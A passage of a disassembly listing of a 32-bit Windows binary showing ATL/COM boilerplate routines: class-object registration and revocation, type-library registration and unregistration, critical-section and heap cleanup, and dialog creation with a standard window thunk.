loc_404512: ; CODE XREF: sub_404320+1A4�j
mov eax, [ebp+lpMem]
test eax, eax
jz short loc_404529
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], 0
loc_404529: ; CODE XREF: sub_404320+1F7�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call ds:SysFreeString
lea esp, [ebp-24Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_404320 endp
; =============== S U B R O U T I N E =======================================
sub_404540 proc near ; CODE XREF: sub_4010C0+190�p
; sub_4010C0+26C�p
push esi
mov esi, ecx
push 28h ; dwBytes
mov dword ptr [esi+4], 0
mov dword ptr [esi+8], 0Ah
call sub_40AE50
add esp, 4
mov [esi], eax
mov eax, esi
pop esi
retn
sub_404540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_404570(LPVOID lpMem,char)
sub_404570 proc near ; CODE XREF: sub_4010C0+461�p
arg_0 = byte ptr 4
push esi
mov esi, ecx
lea ecx, [esi+20h]
mov dword ptr [esi], offset off_40D698
call sub_408C20
test [esp+4+arg_0], 1
jz short loc_404591
push esi ; lpMem
call sub_40AF60
add esp, 4
loc_404591: ; CODE XREF: sub_404570+16�j
mov eax, esi
pop esi
retn 4
sub_404570 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4045A0 proc near ; CODE XREF: sub_4010C0+54�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
cmp esi, ebx
jnz short loc_4045B6
pop esi
mov eax, 80070057h
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_4045B6: ; CODE XREF: sub_4045A0+A�j
mov eax, [esp+8+arg_4]
lea ecx, [esi+1Ch]
mov [esi+10h], eax
mov eax, [esp+8+arg_8]
push edi
mov edi, ds:InitializeCriticalSection
push ecx ; lpCriticalSection
mov [esi+8], eax
mov [esi+0Ch], eax
mov [esi+4], eax
mov [esi+14h], ebx
mov [esi+18h], ebx
call edi ; InitializeCriticalSection
lea edx, [esi+34h]
push edx ; lpCriticalSection
call edi ; InitializeCriticalSection
lea eax, [esi+4Ch]
push eax ; lpCriticalSection
call edi ; InitializeCriticalSection
mov edi, [esi+10h]
mov [esi+68h], ebx
cmp edi, ebx
mov byte ptr [esi+6Ch], 1
mov [esi+74h], ebx
mov [esi+7Ch], ebx
mov [esi+78h], ebx
mov [esi+80h], ebx
jz short loc_404620
cmp [edi], ebx
jz short loc_404620
loc_40460A: ; CODE XREF: sub_4045A0+7E�j
push 1
call dword ptr [edi+20h]
cmp dword ptr [esi], 64h
jnz short loc_404619
add edi, 1Ch
jmp short loc_40461C
; ---------------------------------------------------------------------------
loc_404619: ; CODE XREF: sub_4045A0+72�j
add edi, 24h
loc_40461C: ; CODE XREF: sub_4045A0+77�j
cmp [edi], ebx
jnz short loc_40460A
loc_404620: ; CODE XREF: sub_4045A0+64�j
; sub_4045A0+68�j
pop edi
pop esi
xor eax, eax
pop ebx
retn 0Ch
sub_4045A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_404630(int,DWORD dwClsContext,LPUNKNOWN flags)
sub_404630 proc near ; CODE XREF: sub_4010C0+352�p
arg_0 = dword ptr 4
dwClsContext = dword ptr 8
flags = dword ptr 0Ch
mov ecx, [esp+arg_0]
test ecx, ecx
jnz short loc_404640
mov eax, 80070057h
retn 0Ch
; ---------------------------------------------------------------------------
loc_404640: ; CODE XREF: sub_404630+6�j
push ebx
push ebp
push esi
mov esi, [ecx+10h]
xor eax, eax
push edi
cmp dword ptr [esi], 0
jz short loc_4046BD
mov ebp, [esp+10h+flags]
lea ebx, [esi+14h]
loc_404655: ; CODE XREF: sub_404630+8B�j
test eax, eax
jnz short loc_4046BD
mov [esp+10h+flags], eax
mov eax, [esi+8]
test eax, eax
jz short loc_4046A5
mov edx, [esi+0Ch]
lea ecx, [esp+10h+flags]
push ecx
push offset dword_40D830
push edx
call eax
mov edi, eax
test edi, edi
jl short loc_404691
mov eax, [esp+10h+dwClsContext]
mov ecx, [esp+10h+flags]
mov edx, [esi]
push ebx ; lpdwRegister
push ebp ; flags
push eax ; dwClsContext
push ecx ; pUnk
push edx ; rclsid
call ds:CoRegisterClassObject
mov edi, eax
loc_404691: ; CODE XREF: sub_404630+48�j
mov eax, [esp+10h+flags]
test eax, eax
jz short loc_40469F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40469F: ; CODE XREF: sub_404630+67�j
mov ecx, [esp+10h+arg_0]
mov eax, edi
loc_4046A5: ; CODE XREF: sub_404630+32�j
cmp dword ptr [ecx], 64h
jnz short loc_4046B2
add esi, 1Ch
add ebx, 1Ch
jmp short loc_4046B8
; ---------------------------------------------------------------------------
loc_4046B2: ; CODE XREF: sub_404630+78�j
add esi, 24h
add ebx, 24h
loc_4046B8: ; CODE XREF: sub_404630+80�j
cmp dword ptr [esi], 0
jnz short loc_404655
loc_4046BD: ; CODE XREF: sub_404630+1C�j
; sub_404630+27�j
pop edi
pop esi
pop ebp
pop ebx
retn 0Ch
sub_404630 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046D0 proc near ; CODE XREF: sub_4010C0+46B�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_4046E2
mov eax, 80070057h
pop edi
retn 4
; ---------------------------------------------------------------------------
loc_4046E2: ; CODE XREF: sub_4046D0+7�j
push ebx
push esi
mov esi, [edi+10h]
xor eax, eax
cmp dword ptr [esi], 0
jz short loc_404710
mov ebx, ds:CoRevokeClassObject
loc_4046F4: ; CODE XREF: sub_4046D0+3E�j
test eax, eax
jnz short loc_404710
mov eax, [esi+14h]
push eax ; dwRegister
call ebx ; CoRevokeClassObject
cmp dword ptr [edi], 64h
jnz short loc_404708
add esi, 1Ch
jmp short loc_40470B
; ---------------------------------------------------------------------------
loc_404708: ; CODE XREF: sub_4046D0+31�j
add esi, 24h
loc_40470B: ; CODE XREF: sub_4046D0+36�j
cmp dword ptr [esi], 0
jnz short loc_4046F4
loc_404710: ; CODE XREF: sub_4046D0+1C�j
; sub_4046D0+26�j
pop esi
pop ebx
pop edi
retn 4
sub_4046D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404720 proc near ; CODE XREF: sub_4010C0+480�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_404732
mov eax, 80070057h
pop edi
retn 4
; ---------------------------------------------------------------------------
loc_404732: ; CODE XREF: sub_404720+7�j
push ebp
push esi
mov esi, [edi+10h]
test esi, esi
jz short loc_40476B
cmp dword ptr [esi], 0
jz short loc_40476B
loc_404740: ; CODE XREF: sub_404720+49�j
mov eax, [esi+10h]
test eax, eax
jz short loc_40474D
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40474D: ; CODE XREF: sub_404720+25�j
push 0
mov dword ptr [esi+10h], 0
call dword ptr [esi+20h]
cmp dword ptr [edi], 64h
jnz short loc_404763
add esi, 1Ch
jmp short loc_404766
; ---------------------------------------------------------------------------
loc_404763: ; CODE XREF: sub_404720+3C�j
add esi, 24h
loc_404766: ; CODE XREF: sub_404720+41�j
cmp dword ptr [esi], 0
jnz short loc_404740
loc_40476B: ; CODE XREF: sub_404720+19�j
; sub_404720+1E�j
mov esi, ds:DeleteCriticalSection
lea edx, [edi+1Ch]
push edx ; lpCriticalSection
call esi ; DeleteCriticalSection
lea eax, [edi+34h]
push eax ; lpCriticalSection
call esi ; DeleteCriticalSection
lea ecx, [edi+4Ch]
push ecx ; lpCriticalSection
call esi ; DeleteCriticalSection
mov esi, [edi+80h]
test esi, esi
jz short loc_4047A5
loc_40478D: ; CODE XREF: sub_404720+83�j
mov edx, [esi+4]
push edx
call dword ptr [esi]
mov ebp, [esi+8]
push esi ; lpMem
call sub_40AF60
add esp, 4
mov esi, ebp
test ebp, ebp
jnz short loc_40478D
loc_4047A5: ; CODE XREF: sub_404720+6B�j
mov eax, [edi+18h]
test eax, eax
jz short loc_4047D9
mov al, [edi+6Ch]
test al, al
jz short loc_4047D9
mov eax, [edi+78h]
mov ebp, ds:HeapDestroy
test eax, eax
jz short loc_4047D3
xor esi, esi
loc_4047C2: ; CODE XREF: sub_404720+B1�j
mov eax, [edi+78h]
mov ecx, [eax+esi*4]
push ecx ; hHeap
call ebp ; HeapDestroy
mov eax, [edi+74h]
inc esi
cmp esi, eax
jbe short loc_4047C2
loc_4047D3: ; CODE XREF: sub_404720+9E�j
mov edx, [edi+18h]
push edx ; hHeap
call ebp ; HeapDestroy
loc_4047D9: ; CODE XREF: sub_404720+8A�j
; sub_404720+91�j
pop esi
pop ebp
xor eax, eax
pop edi
retn 4
sub_404720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4047F0 proc near ; DATA XREF: .rdata:0040D69C�o
mov eax, offset sub_404ED0
retn
sub_4047F0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_404810 proc near ; CODE XREF: sub_4010C0+337�p
lpString = dword ptr -220h
pptlib = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
szHelpDir = word ptr -208h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
sub esp, 220h
test eax, eax
jnz short loc_40482C
mov eax, 80070057h
add esp, 220h
retn 0Ch
; ---------------------------------------------------------------------------
loc_40482C: ; CODE XREF: sub_404810+C�j
push ebx
push ebp
mov ebp, [eax+10h]
push esi
push edi
xor ebx, ebx
mov edi, [ebp+0]
test edi, edi
jz loc_404983
loc_404840: ; CODE XREF: sub_404810+140�j
mov esi, [esp+230h+arg_8]
test esi, esi
jnz short loc_40485E
mov eax, [ebp+18h]
test eax, eax
jz short loc_40486D
call eax
test eax, eax
jnz loc_404935
jmp short loc_40486D
; ---------------------------------------------------------------------------
loc_40485E: ; CODE XREF: sub_404810+39�j
mov ecx, 4
xor eax, eax
repe cmpsd
jnz loc_404935
loc_40486D: ; CODE XREF: sub_404810+40�j
; sub_404810+4C�j
push 1
call dword ptr [ebp+4]
mov ebx, eax
test ebx, ebx
jl loc_404A17
mov ecx, [esp+230h+arg_0]
cmp dword ptr [ecx], 84h
jnz loc_404935
call dword ptr [ebp+1Ch]
mov ebx, [ebp+0]
mov edi, eax
test edi, edi
mov [esp+230h+lpString], 0
jz loc_404933
lea edx, [esp+230h+lpString]
push edx ; ppv
push offset riid ; riid
push 1 ; dwClsContext
push 0 ; pUnkOuter
push offset rclsid ; rclsid
call ds:CoCreateInstance
test eax, eax
jge short loc_4048D4
mov eax, [esp+230h+lpString]
test eax, eax
jz short loc_404933
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp short loc_404933
; ---------------------------------------------------------------------------
loc_4048D4: ; CODE XREF: sub_404810+B2�j
cmp dword ptr [edi], 0
jz short loc_404925
loc_4048D9: ; CODE XREF: sub_404810+113�j
mov edx, [edi+4]
mov eax, [edx]
mov [esp+230h+var_218], eax
mov ecx, [edx+4]
mov [esp+230h+var_214], ecx
mov eax, [edx+8]
mov [esp+230h+var_210], eax
mov eax, [edi]
mov ecx, [edx+0Ch]
cmp eax, 1
mov eax, [esp+230h+lpString]
mov [esp+230h+var_20C], ecx
lea ecx, [esp+230h+var_218]
mov edx, [eax]
push ecx
push 1
push ebx
push eax
jnz short loc_404912
call dword ptr [edx+14h]
jmp short loc_404915
; ---------------------------------------------------------------------------
loc_404912: ; CODE XREF: sub_404810+FB�j
call dword ptr [edx+1Ch]
loc_404915: ; CODE XREF: sub_404810+100�j
mov esi, eax
test esi, esi
jl short loc_404955
mov eax, [edi+8]
add edi, 8
test eax, eax
jnz short loc_4048D9
loc_404925: ; CODE XREF: sub_404810+C7�j
mov eax, [esp+230h+lpString]
test eax, eax
jz short loc_404933
mov edx, [eax]
push eax
call dword ptr [edx+8]
loc_404933: ; CODE XREF: sub_404810+91�j
; sub_404810+BA�j ...
xor ebx, ebx
loc_404935: ; CODE XREF: sub_404810+46�j
; sub_404810+57�j ...
mov eax, [esp+230h+arg_0]
cmp dword ptr [eax], 64h
jnz short loc_404946
add ebp, 1Ch
jmp short loc_404949
; ---------------------------------------------------------------------------
loc_404946: ; CODE XREF: sub_404810+12F�j
add ebp, 24h
loc_404949: ; CODE XREF: sub_404810+134�j
mov edi, [ebp+0]
test edi, edi
jz short loc_404974
jmp loc_404840
; ---------------------------------------------------------------------------
loc_404955: ; CODE XREF: sub_404810+109�j
mov eax, [esp+230h+lpString]
test eax, eax
jz short loc_404963
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_404963: ; CODE XREF: sub_404810+14B�j
mov ebx, esi
pop edi
pop esi
mov eax, ebx
pop ebp
pop ebx
add esp, 220h
retn 0Ch
; ---------------------------------------------------------------------------
loc_404974: ; CODE XREF: sub_404810+13E�j
test ebx, ebx
jl loc_404A17
mov eax, [esp+230h+arg_0]
loc_404983: ; CODE XREF: sub_404810+2A�j
mov edx, [esp+230h+arg_4]
xor ecx, ecx
cmp edx, ecx
jz loc_404A17
lea edx, [esp+230h+pptlib]
mov [esp+230h+lpString], ecx
push edx ; pptlib
lea edx, [esp+234h+lpString]
push edx ; int
push ecx ; lpWideCharStr
push eax ; int
mov [esp+240h+pptlib], ecx
call sub_404C30
mov ebx, eax
test ebx, ebx
jl short loc_4049FE
mov eax, [esp+230h+lpString]
push eax ; lpString
mov esi, eax
call ds:lstrlenW ; lstrlenW
lea ecx, [eax+eax+2]
lea edi, [esp+230h+szHelpDir]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+230h+szHelpDir]
push ecx
call sub_404A30
mov [esp+eax*2+230h+szHelpDir], 0
lea edx, [esp+230h+szHelpDir]
mov eax, [esp+230h+lpString]
mov ecx, [esp+230h+pptlib]
push edx ; szHelpDir
push eax ; szFullPath
push ecx ; ptlib
call ds:RegisterTypeLib
mov ebx, eax
loc_4049FE: ; CODE XREF: sub_404810+1A1�j
mov eax, [esp+230h+pptlib]
test eax, eax
jz short loc_404A0C
mov edx, [eax]
push eax
call dword ptr [edx+8]
loc_404A0C: ; CODE XREF: sub_404810+1F4�j
mov eax, [esp+230h+lpString]
push eax ; bstrString
call ds:SysFreeString
loc_404A17: ; CODE XREF: sub_404810+66�j
; sub_404810+166�j ...
pop edi
pop esi
mov eax, ebx
pop ebp
pop ebx
add esp, 220h
retn 0Ch
sub_404810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404A30 proc near ; CODE XREF: sub_404810+1CB�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, esi
mov ecx, esi
cmp word ptr [esi], 0
jz short loc_404A64
loc_404A3F: ; CODE XREF: sub_404A30+32�j
mov dx, [ecx]
test dx, dx
jz short loc_404A4A
add ecx, 2
loc_404A4A: ; CODE XREF: sub_404A30+15�j
cmp dx, 5Ch
jz short loc_404A5C
cmp dx, 2Fh
jz short loc_404A5C
cmp dx, 3Ah
jnz short loc_404A5E
loc_404A5C: ; CODE XREF: sub_404A30+1E�j
; sub_404A30+24�j
mov eax, ecx
loc_404A5E: ; CODE XREF: sub_404A30+2A�j
cmp word ptr [ecx], 0
jnz short loc_404A3F
loc_404A64: ; CODE XREF: sub_404A30+D�j
sub eax, esi
pop esi
sar eax, 1
retn 4
sub_404A30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_404A70(int pptlib,BSTR bstrString,int)
sub_404A70 proc near ; CODE XREF: sub_4010C0+25C�p
ppv = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
pptlib = dword ptr 4
bstrString = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+pptlib]
sub esp, 14h
push ebp
xor ebp, ebp
cmp eax, ebp
jnz short loc_404A8A
mov eax, 80070057h
pop ebp
add esp, 14h
retn 0Ch
; ---------------------------------------------------------------------------
loc_404A8A: ; CODE XREF: sub_404A70+C�j
push ebx
mov ebx, [eax+10h]
push esi
push edi
mov edi, [ebx]
cmp edi, ebp
jz loc_404B7E
loc_404A9A: ; CODE XREF: sub_404A70+104�j
mov esi, [esp+24h+arg_8]
cmp esi, ebp
jnz short loc_404AB5
mov eax, [ebx+18h]
cmp eax, ebp
jz short loc_404AC4
call eax
test eax, eax
jnz loc_404B5F
jmp short loc_404AC4
; ---------------------------------------------------------------------------
loc_404AB5: ; CODE XREF: sub_404A70+30�j
mov ecx, 4
xor eax, eax
repe cmpsd
jnz loc_404B5F
loc_404AC4: ; CODE XREF: sub_404A70+37�j
; sub_404A70+43�j
push ebp
call dword ptr [ebx+4]
call dword ptr [ebx+1Ch]
mov edi, [ebx]
mov esi, eax
cmp esi, ebp
mov [esp+24h+ppv], ebp
jz loc_404B5F
lea ecx, [esp+24h+ppv]
push ecx ; ppv
push offset riid ; riid
push 1 ; dwClsContext
push ebp ; pUnkOuter
push offset rclsid ; rclsid
call ds:CoCreateInstance
test eax, eax
jge short loc_404B07
mov eax, [esp+24h+ppv]
cmp eax, ebp
jz short loc_404B5F
mov edx, [eax]
push eax
call dword ptr [edx+8]
jmp short loc_404B5F
; ---------------------------------------------------------------------------
loc_404B07: ; CODE XREF: sub_404A70+85�j
cmp [esi], ebp
jz short loc_404B51
loc_404B0B: ; CODE XREF: sub_404A70+DF�j
mov eax, [esi+4]
mov ecx, [eax]
mov [esp+24h+var_10], ecx
mov edx, [eax+4]
mov [esp+24h+var_C], edx
mov ecx, [eax+8]
mov [esp+24h+var_8], ecx
mov edx, [eax+0Ch]
mov eax, [esi]
mov [esp+24h+var_4], edx
lea edx, [esp+24h+var_10]
cmp eax, 1
mov eax, [esp+24h+ppv]
push edx
push 1
mov ecx, [eax]
push edi
push eax
jnz short loc_404B44
call dword ptr [ecx+18h]
jmp short loc_404B47
; ---------------------------------------------------------------------------
loc_404B44: ; CODE XREF: sub_404A70+CD�j
call dword ptr [ecx+20h]
loc_404B47: ; CODE XREF: sub_404A70+D2�j
mov eax, [esi+8]
add esi, 8
cmp eax, ebp
jnz short loc_404B0B
loc_404B51: ; CODE XREF: sub_404A70+99�j
mov eax, [esp+24h+ppv]
cmp eax, ebp
jz short loc_404B5F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_404B5F: ; CODE XREF: sub_404A70+3D�j
; sub_404A70+4E�j ...
mov edx, [esp+24h+pptlib]
cmp dword ptr [edx], 64h
jnz short loc_404B6D
add ebx, 1Ch
jmp short loc_404B70
; ---------------------------------------------------------------------------
loc_404B6D: ; CODE XREF: sub_404A70+F6�j
add ebx, 24h
loc_404B70: ; CODE XREF: sub_404A70+FB�j
mov edi, [ebx]
cmp edi, ebp
jnz loc_404A9A
mov eax, [esp+24h+pptlib]
loc_404B7E: ; CODE XREF: sub_404A70+24�j
cmp [esp+24h+bstrString], ebp
jz loc_404C21
lea ecx, [esp+24h+pptlib]
lea edx, [esp+24h+bstrString]
push ecx ; pptlib
push edx ; int
push ebp ; lpWideCharStr
push eax ; int
mov [esp+34h+bstrString], ebp
mov [esp+34h+pptlib], ebp
call sub_404C30
test eax, eax
jl short loc_404C08
mov eax, [esp+24h+pptlib]
lea edx, [esp+24h+arg_8]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+1Ch]
test eax, eax
jl short loc_404C08
push offset LibFileName ; "oleaut32.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov esi, eax
cmp esi, ebp
jz short loc_404BF9
push offset ProcName ; "UnRegisterTypeLib"
push esi ; hModule
call ds:GetProcAddress ; GetProcAddress
cmp eax, ebp
jz short loc_404BF2
mov ecx, [esp+24h+arg_8]
mov edx, [ecx+14h]
push edx
mov edx, [ecx+10h]
push edx
mov dx, [ecx+1Ah]
push edx
mov dx, [ecx+18h]
push edx
push ecx
call eax
loc_404BF2: ; CODE XREF: sub_404A70+167�j
push esi ; hLibModule
call ds:FreeLibrary ; FreeLibrary
loc_404BF9: ; CODE XREF: sub_404A70+157�j
mov eax, [esp+24h+pptlib]
mov edx, [esp+24h+arg_8]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+30h]
loc_404C08: ; CODE XREF: sub_404A70+133�j
; sub_404A70+146�j
mov eax, [esp+24h+pptlib]
cmp eax, ebp
jz short loc_404C16
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_404C16: ; CODE XREF: sub_404A70+19E�j
mov edx, [esp+24h+bstrString]
push edx ; bstrString
call ds:SysFreeString
loc_404C21: ; CODE XREF: sub_404A70+112�j
pop edi
pop esi
pop ebx
xor eax, eax
pop ebp
add esp, 14h
retn 0Ch
sub_404A70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_404C30(int,LPCWSTR lpWideCharStr,int,ITypeLib **pptlib)
sub_404C30 proc near ; CODE XREF: sub_404810+198�p
; sub_404A70+12C�p
String = byte ptr -110h
arg_0 = dword ptr 8
lpWideCharStr = dword ptr 0Ch
arg_8 = dword ptr 10h
pptlib = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 110h
mov eax, [ebp+arg_8]
mov ecx, [ebp+pptlib]
push ebx
push esi
mov dword ptr [eax], 0
mov eax, [ebp+arg_0]
push edi
mov dword ptr [ecx], 0
mov ecx, [eax+0Ch]
lea edx, [ebp+String]
push 104h ; nSize
push edx ; lpFilename
push ecx ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
mov ebx, [ebp+lpWideCharStr]
test ebx, ebx
jz short loc_404CAB
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
lea edi, [eax+eax+2]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov esi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [esi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
lea edx, [ebp+String]
push esi ; lpString2
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
loc_404CAB: ; CODE XREF: sub_404C30+3C�j
mov ebx, ds:lstrlenA
lea eax, [ebp+String]
test eax, eax
jnz short loc_404CBF
xor edi, edi
jmp short loc_404CF4
; ---------------------------------------------------------------------------
loc_404CBF: ; CODE XREF: sub_404C30+89�j
lea ecx, [ebp+String]
push ecx ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea edx, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
loc_404CF4: ; CODE XREF: sub_404C30+8D�j
mov eax, [ebp+pptlib]
push eax ; pptlib
push edi ; szFile
call ds:LoadTypeLib
mov esi, eax
test esi, esi
jge loc_404D97
mov cl, [ebp+String]
xor esi, esi
test cl, cl
lea eax, [ebp+String]
jz short loc_404D35
mov edi, ds:CharNextA
loc_404D21: ; CODE XREF: sub_404C30+FF�j
cmp cl, 2Eh
jnz short loc_404D28
mov esi, eax
loc_404D28: ; CODE XREF: sub_404C30+F4�j
push eax ; lpsz
call edi ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_404D21
test esi, esi
jnz short loc_404D37
loc_404D35: ; CODE XREF: sub_404C30+E9�j
mov esi, eax
loc_404D37: ; CODE XREF: sub_404C30+103�j
push offset a_tlb ; ".tlb"
push esi ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_404D51
xor edi, edi
jmp short loc_404D86
; ---------------------------------------------------------------------------
loc_404D51: ; CODE XREF: sub_404C30+11B�j
lea edx, [ebp+String]
push edx ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
loc_404D86: ; CODE XREF: sub_404C30+11F�j
mov ecx, [ebp+pptlib]
push ecx ; pptlib
push edi ; szFile
call ds:LoadTypeLib
mov esi, eax
test esi, esi
jl short loc_404DA3
loc_404D97: ; CODE XREF: sub_404C30+D3�j
push edi ; psz
call ds:SysAllocString
mov edx, [ebp+arg_8]
mov [edx], eax
loc_404DA3: ; CODE XREF: sub_404C30+165�j
lea esp, [ebp-11Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_404C30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_404DC0(HWND hWndParent,LPARAM dwInitParam)
sub_404DC0 proc near ; CODE XREF: sub_4010C0+3D5�p
hWndParent = dword ptr 4
dwInitParam = dword ptr 8
push esi
lea esi, [ecx+8]
mov [esi], ecx
call ds:GetCurrentThreadId ; GetCurrentThreadId
push offset CriticalSection ; lpCriticalSection
mov [esi+4], eax
call ds:EnterCriticalSection
mov eax, dword_40FB48
push offset CriticalSection ; lpCriticalSection
mov [esi+8], eax
mov dword_40FB48, esi
call ds:LeaveCriticalSection
mov ecx, [esp+4+dwInitParam]
mov edx, [esp+4+hWndParent]
mov eax, hInstance
push ecx ; dwInitParam
push offset DialogFunc ; lpDialogFunc
push edx ; hWndParent
push 65h ; lpTemplateName
push eax ; hInstance
call ds:CreateDialogParamA ; CreateDialogParamA
pop esi
retn 8
sub_404DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; INT_PTR __stdcall DialogFunc(HWND,UINT,WPARAM,LPARAM)
DialogFunc proc near ; DATA XREF: sub_404DC0+41�o
hWnd = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push offset CriticalSection ; lpCriticalSection
xor edi, edi
call ds:EnterCriticalSection
mov esi, dword_40FB48
test esi, esi
jz short loc_404E68
call ds:GetCurrentThreadId ; GetCurrentThreadId
xor ecx, ecx
loc_404E42: ; CODE XREF: DialogFunc+2E�j
cmp [esi+4], eax
jz short loc_404E52
mov ecx, esi
mov esi, [esi+8]
test esi, esi
jnz short loc_404E42
jmp short loc_404E68
; ---------------------------------------------------------------------------
loc_404E52: ; CODE XREF: DialogFunc+25�j
test ecx, ecx
jnz short loc_404E60
mov eax, [esi+8]
mov dword_40FB48, eax
jmp short loc_404E66
; ---------------------------------------------------------------------------
loc_404E60: ; CODE XREF: DialogFunc+34�j
mov edx, [esi+8]
mov [ecx+8], edx
loc_404E66: ; CODE XREF: DialogFunc+3E�j
mov edi, [esi]
loc_404E68: ; CODE XREF: DialogFunc+18�j
; DialogFunc+30�j
push offset CriticalSection ; lpCriticalSection
call ds:LeaveCriticalSection
mov eax, [edi]
mov ecx, edi
mov ebx, [esp+0Ch+hWnd]
mov [edi+4], ebx
call dword ptr [eax+4]
lea esi, [edi+8]
push 0Dh ; dwSize
sub eax, esi
push esi ; lpBaseAddress
sub eax, 0Dh
mov dword ptr [esi], 42444C7h
mov [esi+4], edi
mov byte ptr [esi+8], 0E9h
mov [esi+9], eax
call ds:GetCurrentProcess ; GetCurrentProcess
push eax ; hProcess
call ds:FlushInstructionCache ; FlushInstructionCache
push esi ; dwNewLong
push 4 ; nIndex
push ebx ; hWnd
call ds:SetWindowLongA ; SetWindowLongA
mov ecx, [esp+0Ch+arg_C]
mov edx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
push ecx
push edx
push eax
push ebx
call esi
pop edi
pop esi
pop ebx
retn 10h
DialogFunc endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_404ED0(LONG dwNewLong,int,int,int)
sub_404ED0 proc near ; DATA XREF: sub_4047F0�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
dwNewLong = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 1Ch
push ebx
mov edx, [esp+20h+arg_C]
push ebp
mov ecx, [esp+24h+arg_8]
push esi
mov esi, [esp+28h+dwNewLong]
xor ebx, ebx
push edi
mov ebp, [esi+18h]
mov edi, [esp+2Ch+arg_4]
mov eax, [esi+4]
mov [esp+2Ch+var_C], ebx
mov [esp+2Ch+var_8], ebx
mov [esp+2Ch+var_4], ebx
push ebx
lea ebx, [esp+30h+dwNewLong]
mov [esp+30h+arg_4], ebp
lea ebp, [esp+30h+var_1C]
push ebx
push edx
mov [esi+18h], ebp
mov ebp, [esi]
push ecx
